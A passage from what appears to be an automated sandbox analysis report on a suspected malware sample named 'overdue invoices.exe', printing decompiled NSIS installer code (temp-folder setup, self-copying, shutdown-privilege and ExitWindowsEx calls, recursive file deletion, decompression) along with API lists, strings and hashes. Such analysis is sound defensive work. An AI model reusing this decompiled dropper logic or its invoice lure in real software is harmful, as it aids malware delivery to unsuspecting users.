							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105); // executed
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34; // 0x0
											if(__eflags != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x423ebc; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\engineer\\Desktop";
										if(lstrcmpiA(_t105, "C:\\Users\\engineer\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t101);
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x423eb0; // 0x55dba8
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\overdue invoices.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												_t77 =  *0x423eb0; // 0x55dba8
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                  0x00403231
                  0x00403235
                  0x0040323d
                  0x0040323f
                  0x00403244
                  0x0040324f
                  0x00403256
                  0x0040325e
                  0x00403268
                  0x0040327e
                  0x0040328e
                  0x00403293
                  0x00403299
                  0x004032a0
                  0x004032b3
                  0x004032b8
                  0x004032ba
                  0x004032bc
                  0x004032c1
                  0x004032c1
                  0x004032d1
                  0x004032d7
                  0x00403340
                  0x00403340
                  0x00403342
                  0x00403344
                  0x00000000
                  0x00000000
                  0x004032dd
                  0x004032e0
                  0x004032e8
                  0x004032e8
                  0x004032eb
                  0x004032f0
                  0x004032f2
                  0x004032f2
                  0x004032f3
                  0x004032f3
                  0x004032f8
                  0x004032fb
                  0x00403330
                  0x00403335
                  0x0040333a
                  0x0040333d
                  0x0040333f
                  0x0040333f
                  0x0040333f
                  0x00000000
                  0x004032fd
                  0x004032fd
                  0x004032fe
                  0x00403301
                  0x00403309
                  0x0040330c
                  0x0040330e
                  0x0040330e
                  0x0040330e
                  0x0040330c
                  0x00403311
                  0x00403317
                  0x0040331f
                  0x00403322
                  0x00403324
                  0x00403324
                  0x00403324
                  0x00403322
                  0x00403327
                  0x0040332e
                  0x00403348
                  0x0040334b
                  0x0040334b
                  0x00403354
                  0x00403359
                  0x00403359
                  0x00403364
                  0x0040336a
                  0x0040336f
                  0x00403371
                  0x00403393
                  0x00403398
                  0x0040339f
                  0x004033a6
                  0x004033aa
                  0x00403411
                  0x00403411
                  0x00403416
                  0x00403420
                  0x0040350b
                  0x00403511
                  0x0040351c
                  0x00403525
                  0x00403527
                  0x0040352c
                  0x0040352e
                  0x00403530
                  0x00403532
                  0x00403534
                  0x00403536
                  0x00403538
                  0x00403548
                  0x0040354a
                  0x0040354c
                  0x00403559
                  0x00403568
                  0x00403570
                  0x00403578
                  0x00403578
                  0x0040354c
                  0x00403538
                  0x00403534
                  0x0040357d
                  0x00403583
                  0x00403585
                  0x00403589
                  0x00403589
                  0x00403585
                  0x0040358e
                  0x00403593
                  0x00403596
                  0x00403598
                  0x00403598
                  0x004035a0
                  0x004035a0
                  0x0040342f
                  0x00403436
                  0x00403436
                  0x004033ac
                  0x004033b2
                  0x00403401
                  0x00403401
                  0x0040340d
                  0x00000000
                  0x0040340d
                  0x004033bb
                  0x004033c8
                  0x004033bf
                  0x004033c5
                  0x00000000
                  0x00000000
                  0x004033c7
                  0x004033c7
                  0x004033c7
                  0x004033cc
                  0x004033ce
                  0x004033d6
                  0x00403442
                  0x00403447
                  0x00403456
                  0x00000000
                  0x00000000
                  0x0040345a
                  0x00403461
                  0x00403467
                  0x0040346d
                  0x00403475
                  0x00403475
                  0x00403483
                  0x0040348a
                  0x00403493
                  0x00403499
                  0x00403499
                  0x004034a5
                  0x004034ab
                  0x004034b5
                  0x004034c9
                  0x004034ca
                  0x004034cb
                  0x004034d0
                  0x004034dc
                  0x004034e2
                  0x004034e9
                  0x004034ec
                  0x004034f2
                  0x004034f2
                  0x004034e9
                  0x004034f6
                  0x004034fc
                  0x004034fc
                  0x004034ff
                  0x00403500
                  0x00403501
                  0x00000000
                  0x00403501
                  0x004033d8
                  0x004033da
                  0x004033e5
                  0x00000000
                  0x00000000
                  0x004033ed
                  0x004033f8
                  0x004033fd
                  0x00000000
                  0x004033fd
                  0x00403379
                  0x00403385
                  0x0040338a
                  0x0040338f
                  0x00403391
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403391
                  0x00000000
                  0x0040332e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004032e2
                  0x004032e2
                  0x004032e2
                  0x004032e3
                  0x004032e3
                  0x00000000
                  0x004032e2
                  0x00000000

                  APIs
                  • #17.COMCTL32 ref: 00403244
                  • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                  • OleInitialize.OLE32(00000000), ref: 00403256
                    • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                    • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                    • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                  • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                    • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,vmklrdjtbsiifoh Setup,NSIS Error), ref: 00405A92
                  • GetCommandLineA.KERNEL32(vmklrdjtbsiifoh Setup,NSIS Error), ref: 00403293
                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\overdue invoices.exe" ,00000000), ref: 004032A6
                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\overdue invoices.exe" ,00000020), ref: 004032D1
                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                  • DeleteFileA.KERNELBASE(1033), ref: 00403398
                  • OleUninitialize.OLE32(00000000), ref: 00403416
                  • ExitProcess.KERNEL32 ref: 00403436
                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\overdue invoices.exe" ,00000000,00000000), ref: 00403442
                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\overdue invoices.exe" ,00000000,00000000), ref: 0040344E
                  • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                  • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                  • CopyFileA.KERNEL32(C:\Users\user\Desktop\overdue invoices.exe,0041F050,00000001), ref: 004034BF
                  • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                  • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                  • ExitProcess.KERNEL32 ref: 004035A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                  • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\overdue invoices.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\overdue invoices.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$vmklrdjtbsiifoh Setup$~nsu.tmp
                  • API String ID: 2278157092-551755865
                  • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                  • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                  • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                  • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004053AA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 248 4053aa-4053c5 call 405659 251 4053c7-4053d9 DeleteFileA 248->251 252 4053de-4053e8 248->252 253 405572-405575 251->253 254 4053ea-4053ec 252->254 255 4053fc-40540a call 405a85 252->255 256 4053f2-4053f6 254->256 257 40551d-405523 254->257 263 405419-40541a call 4055bf 255->263 264 40540c-405417 lstrcatA 255->264 256->255 256->257 257->253 259 405525-405528 257->259 261 405532-40553a call 405d7c 259->261 262 40552a-405530 259->262 261->253 272 40553c-405551 call 405578 call 40573d RemoveDirectoryA 261->272 262->253 265 40541f-405422 263->265 264->265 268 405424-40542b 265->268 269 40542d-405433 lstrcatA 265->269 268->269 271 405438-405456 lstrlenA FindFirstFileA 268->271 269->271 273 405513-405517 271->273 274 40545c-405473 call 4055a3 271->274 284 405553-405557 272->284 285 40556a-40556d call 404e23 272->285 273->257 276 405519 273->276 282 405475-405479 274->282 283 40547e-405481 274->283 276->257 282->283 286 40547b 282->286 287 405483-405488 283->287 288 405494-4054a2 call 405a85 283->288 284->262 290 405559-405568 call 404e23 call 4057d3 284->290 285->253 286->283 292 4054f2-405504 FindNextFileA 287->292 293 40548a-40548c 287->293 298 4054a4-4054ac 288->298 299 4054b9-4054c8 call 40573d DeleteFileA 288->299 290->253 292->274 296 40550a-40550d FindClose 292->296 293->288 297 40548e-405492 293->297 296->273 297->288 297->292 298->292 301 4054ae-4054b7 call 4053aa 298->301 308 4054ea-4054ed call 404e23 299->308 309 4054ca-4054ce 299->309 301->292 308->292 311 4054d0-4054e0 call 404e23 call 4057d3 309->311 312 4054e2-4054e8 309->312 311->292 312->292
                  C-Code - Quality: 94%
                  			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                  0x004053b5
                  0x004053b9
                  0x004053c2
                  0x004053c5
                  0x004053c8
                  0x004053d0
                  0x004053d2
                  0x004053d3
                  0x00000000
                  0x004053d3
                  0x004053e2
                  0x004053e2
                  0x004053e5
                  0x004053e8
                  0x004053fc
                  0x00405403
                  0x00405408
                  0x0040540a
                  0x0040541a
                  0x0040540c
                  0x00405412
                  0x00405412
                  0x0040541f
                  0x00405422
                  0x0040542d
                  0x00405433
                  0x00405438
                  0x00405448
                  0x0040544a
                  0x00405450
                  0x00405453
                  0x00405456
                  0x00405513
                  0x00405513
                  0x00405517
                  0x00405519
                  0x00405519
                  0x00405519
                  0x00405519
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040545c
                  0x0040545c
                  0x00405465
                  0x0040546b
                  0x00405470
                  0x00405473
                  0x00405475
                  0x00405479
                  0x0040547b
                  0x0040547b
                  0x00405479
                  0x0040547e
                  0x00405481
                  0x00405494
                  0x00405496
                  0x0040549b
                  0x004054a2
                  0x004054ba
                  0x004054c0
                  0x004054c6
                  0x004054c8
                  0x004054ed
                  0x004054ca
                  0x004054ca
                  0x004054ce
                  0x004054e2
                  0x004054d0
                  0x004054d3
                  0x004054d8
                  0x004054da
                  0x004054db
                  0x004054db
                  0x004054ce
                  0x004054a4
                  0x004054aa
                  0x004054ac
                  0x004054b2
                  0x004054b2
                  0x004054ac
                  0x00000000
                  0x004054a2
                  0x00405483
                  0x00405486
                  0x00405488
                  0x00000000
                  0x00000000
                  0x0040548a
                  0x0040548c
                  0x00000000
                  0x00000000
                  0x0040548e
                  0x00405492
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004054f2
                  0x004054fc
                  0x00405502
                  0x00405502
                  0x0040550d
                  0x00000000
                  0x0040550d
                  0x00405424
                  0x0040542b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004053ea
                  0x004053ea
                  0x004053ec
                  0x0040551d
                  0x00405520
                  0x00405523
                  0x00405575
                  0x00405575
                  0x00405575
                  0x00405525
                  0x00405528
                  0x00405533
                  0x00405538
                  0x0040553a
                  0x00000000
                  0x00000000
                  0x0040553d
                  0x00405543
                  0x00405549
                  0x0040554f
                  0x00405551
                  0x00000000
                  0x0040556d
                  0x00405553
                  0x00405557
                  0x00000000
                  0x00000000
                  0x0040555c
                  0x00405561
                  0x00405562
                  0x00000000
                  0x00405563
                  0x0040552a
                  0x0040552a
                  0x00000000
                  0x0040552a
                  0x004053f2
                  0x004053f6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004053f6

                  APIs
                  • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\overdue invoices.exe" ,747DF560), ref: 004053C8
                  • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\overdue invoices.exe" ,747DF560), ref: 00405412
                  • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\overdue invoices.exe" ,747DF560), ref: 00405433
                  • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\overdue invoices.exe" ,747DF560), ref: 00405439
                  • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\overdue invoices.exe" ,747DF560), ref: 0040544A
                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                  • FindClose.KERNEL32(?), ref: 0040550D
                  Strings
                  • "C:\Users\user\Desktop\overdue invoices.exe" , xrefs: 004053B4
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                  • \*.*, xrefs: 0040540C
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                  • String ID: "C:\Users\user\Desktop\overdue invoices.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                  • API String ID: 2035342205-2785119035
                  • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                  • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                  • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                  • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040604C Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 519 40604c-406051 520 4060c2-4060e0 519->520 521 406053-406082 519->521 522 4066b8-4066cd 520->522 523 406084-406087 521->523 524 406089-40608d 521->524 525 4066e7-4066fd 522->525 526 4066cf-4066e5 522->526 527 406099-40609c 523->527 528 406095 524->528 529 40608f-406093 524->529 530 406700-406707 525->530 526->530 531 4060ba-4060bd 527->531 532 40609e-4060a7 527->532 528->527 529->527 536 406709-40670d 530->536 537 40672e-40673a 530->537 535 40628f-4062ad 531->535 533 4060a9 532->533 534 4060ac-4060b8 532->534 533->534 538 406122-406150 534->538 542 4062c5-4062d7 535->542 543 4062af-4062c3 535->543 539 406713-40672b 536->539 540 4068bc-4068c6 536->540 544 405ed0-405ed9 537->544 545 406152-40616a 538->545 546 40616c-406186 538->546 539->537 547 4068d2-4068e5 540->547 548 4062da-4062e4 542->548 543->548 549 4068e7 544->549 550 405edf 544->550 551 406189-406193 545->551 546->551 552 4068ea-4068ee 547->552 553 4062e6 548->553 554 406287-40628d 548->554 549->552 556 405ee6-405eea 550->556 557 406026-406047 550->557 558 405f8b-405f8f 550->558 559 405ffb-405fff 550->559 561 406199 551->561 562 40610a-406110 551->562 570 40626c-406284 553->570 571 40686e-406878 553->571 554->535 560 40622b-406235 554->560 556->547 563 405ef0-405efd 556->563 557->522 572 405f95-405fae 558->572 573 40683b-406845 558->573 564 406005-406019 559->564 565 40684a-406854 559->565 566 40687a-406884 560->566 567 40623b-406404 560->567 578 406856-406860 561->578 579 4060ef-406107 561->579 568 4061c3-4061c9 562->568 569 406116-40611c 562->569 563->549 577 405f03-405f49 563->577 580 40601c-406024 564->580 565->547 566->547 567->544 575 406227 568->575 576 4061cb-4061e9 568->576 569->538 569->575 570->554 571->547 582 405fb1-405fb5 572->582 573->547 575->560 583 406201-406213 576->583 584 4061eb-4061ff 576->584 585 405f71-405f73 577->585 586 405f4b-405f4f 577->586 578->547 579->562 580->557 580->559 582->558 587 405fb7-405fbd 582->587 590 406216-406220 583->590 584->590 593 405f81-405f89 585->593 594 405f75-405f7f 585->594 591 405f51-405f54 GlobalFree 586->591 592 405f5a-405f68 GlobalAlloc 586->592 588 405fe7-405ff9 587->588 589 405fbf-405fc6 587->589 588->580 595 405fd1-405fe1 GlobalAlloc 589->595 596 405fc8-405fcb GlobalFree 589->596 590->568 597 406222 590->597 591->592 592->549 598 405f6e 592->598 593->582 594->593 594->594 595->549 595->588 596->595 600 406862-40686c 597->600 601 4061a8-4061c0 597->601 598->585 600->547 601->568
                  C-Code - Quality: 98%
                  			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
